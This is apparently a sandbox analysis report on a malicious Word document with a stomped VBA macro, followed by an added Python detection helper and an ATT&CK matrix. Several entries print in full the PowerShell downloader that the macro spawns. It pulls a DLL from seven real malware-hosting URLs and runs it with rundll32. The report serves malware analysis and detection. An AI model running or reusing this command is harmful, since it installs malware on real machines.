Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............:T.k......T...............7.............}..v....H.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............ZU.k....h.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............ZU.k......................7.............}..v....`.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._....... .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............ZU.k....`.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....`.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H&................7.............}..v.....&......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....5......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H6................7.............}..v.....6......0.b...............T.............(...............Jump to behavior
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$704.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp
Source: classification engine | Classification label: mal92.expl.evad.winDOC@5/13@0/0
Source: 704.doc | OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE document summary: title field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE document summary: author field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : High number of string operations
Obfuscated command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_000007FF00260F3C sldt word ptr [eax]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: 704.doc | OLE indicator, VBA stomping: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE indicator, VBA stomping: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
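The command line in the process-creation entry above is the complete second stage: a hard-coded list of seven URLs is tried in order, the first body that lands on disk is written to c:\programdata\<Get-Random>.dll and handed to the 32-bit rundll32.exe with an export name of "f" plus another random number, and the loop breaks after the first success. The file name and export name therefore change on every run while the structure of the script stays fixed, which is what a detection should key on. The Python below is an added triage helper, not code from the report or from the sample: it unwraps the `$var="...";IEX $var` wrapper at the argv quoting level, extracts the URL list, staging path and loader hand-off, and scores a process-creation record against the chain the report shows (WINWORD.EXE -> cmd.exe -> powershell.exe). The indicator names, the alert threshold and the benign control event are my own assumptions.

```python
"""Triage helper for the PowerShell downloader in the process-creation entry
above. Added example (not report or sample code): unwraps the
  powershell $var="...";IEX $var
wrapper, extracts the URL list / staging path / rundll32 hand-off from the
inner script, and scores a process-creation record against the chain the
report shows (WINWORD.EXE -> cmd.exe -> powershell.exe)."""
import re
from typing import Dict, List

# Copied verbatim from the report's "Process created" entry; split across
# adjacent literals only to keep the lines short.
OBSERVED_CMDLINE = (
    r'powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,'
    r'http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,'
    r'http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,'
    r'http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,'
    r'http://ckfoods.net/wp-admin/wPInm2rgMu/,'
    r'http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,'
    r'http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\"'
    r'.Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;'
    r'$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;'
    r'if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;'
    r'Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj'
)

def unwrap_iex(cmdline: str) -> str:
    """Return the script hidden in  $var="...";IEX $var  with the argv-level
    quoting removed (C runtime rule: 2n+1 backslashes before a quote give n
    backslashes plus a literal quote). Empty string if the pattern is absent."""
    m = re.search(r'\$(\w+)="(.*)";\s*IEX\s+\$\1\s*$', cmdline, re.S)
    if not m:
        return ""
    return re.sub(r'(\\+)"', lambda q: "\\" * (len(q.group(1)) // 2) + '"', m.group(2))

def extract_downloader(cmdline: str) -> Dict[str, object]:
    """Pull the IOCs and the loader hand-off out of the unwrapped script."""
    script = unwrap_iex(cmdline)
    out: Dict[str, object] = {"urls": [], "staging": None, "suffix": None,
                              "loader": None, "export_prefix": None}
    m = re.search(r'\$strs="([^"]*)"\.Split\(","\)', script)
    if m:                                      # the ordered URL fallback list
        out["urls"] = [u for u in m.group(1).split(",") if u]
    m = re.search(r'\$tpth="([^"]*)"\+\$r1\+"([^"]*)"', script)
    if m:                                      # c:\programdata\<Get-Random>.dll
        out["staging"], out["suffix"] = m.group(1), m.group(2)
    m = re.search(r'\$fp="([^"]*rundll32\.exe)"', script)
    if m:                                      # 32-bit rundll32 on a 64-bit host
        out["loader"] = m.group(1)
    m = re.search(r'\$a=\$tpth\+",(\w+)"\+\$r2', script)
    if m:                                      # export name = prefix + Get-Random
        out["export_prefix"] = m.group(1)
    return out

# Indicator names and the threshold below are my own, not Joe Sandbox signatures.
INDICATORS = {
    "office_ancestor":  re.compile(r'(winword|excel|powerpnt|outlook)\.exe$', re.I),
    "shell_parent":     re.compile(r'cmd\.exe$', re.I),
    "web_download":     re.compile(r'invoke-webrequest|\biwr\b|downloadstring|downloadfile', re.I),
    "inline_eval":      re.compile(r'\biex\b|invoke-expression', re.I),
    "rundll32_handoff": re.compile(r'rundll32\.exe', re.I),
    "writable_staging": re.compile(r'programdata|\\temp\\|appdata', re.I),
}

def match_chain(ancestry: List[str], cmdline: str) -> List[str]:
    """ancestry lists process images from the root down to the PowerShell
    process itself; returns the names of the indicators that matched."""
    if not ancestry or not ancestry[-1].lower().endswith("powershell.exe"):
        return []
    hits = []
    if any(INDICATORS["office_ancestor"].search(p) for p in ancestry[:-1]):
        hits.append("office_ancestor")
    if len(ancestry) >= 2 and INDICATORS["shell_parent"].search(ancestry[-2]):
        hits.append("shell_parent")
    for name in ("web_download", "inline_eval", "rundll32_handoff", "writable_staging"):
        if INDICATORS[name].search(cmdline):
            hits.append(name)
    return hits

def is_downloader_chain(ancestry: List[str], cmdline: str) -> bool:
    """Fire on a download plus at least two corroborating signals, so that a
    lone Invoke-WebRequest typed by an administrator does not alert."""
    hits = match_chain(ancestry, cmdline)
    return "web_download" in hits and len(hits) >= 3

# Ancestry reconstructed from the report's process tree.
OBSERVED_EVENT = (["WINWORD.EXE", "cmd.exe", "powershell.exe"], OBSERVED_CMDLINE)
# Constructed benign control (hypothetical host name and path).
BENIGN_EVENT = (["explorer.exe", "powershell.exe"],
                r'powershell Invoke-WebRequest -Uri https://files.example/tool.zip '
                r'-OutFile C:\Users\admin\Downloads\tool.zip')

if __name__ == "__main__":
    for key, value in extract_downloader(OBSERVED_CMDLINE).items():
        print(f"{key}: {value}")
    for ancestry, cmd in (OBSERVED_EVENT, BENIGN_EVENT):
        print(" -> ".join(ancestry), match_chain(ancestry, cmd), is_downloader_chain(ancestry, cmd))
```

The unwrapping step matters more than it looks: the backslashes in the recorded command line are powershell.exe's argument quoting, not PowerShell string escapes, so a regex written against the raw command line would see `\"c:\programdata\\\"` and miss the staging path. The detection deliberately ignores the variable name `$dfkj` and the random file and export names, since all three are throwaway values in this loader.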

Mitre Att&ck Matrix

Digits in parentheses after a technique name are the report's per-cell signature hit markers, kept as printed.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter (1 1 1) | Path Interception | Process Injection (1 1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting (3 2) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution (1) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (3 1) | Security Account Manager | Virtualization/Sandbox Evasion (3 1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell (1) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (1 1) | NTDS | File and Directory Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | System Information Discovery (1 1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting (3 2) | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information (1) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
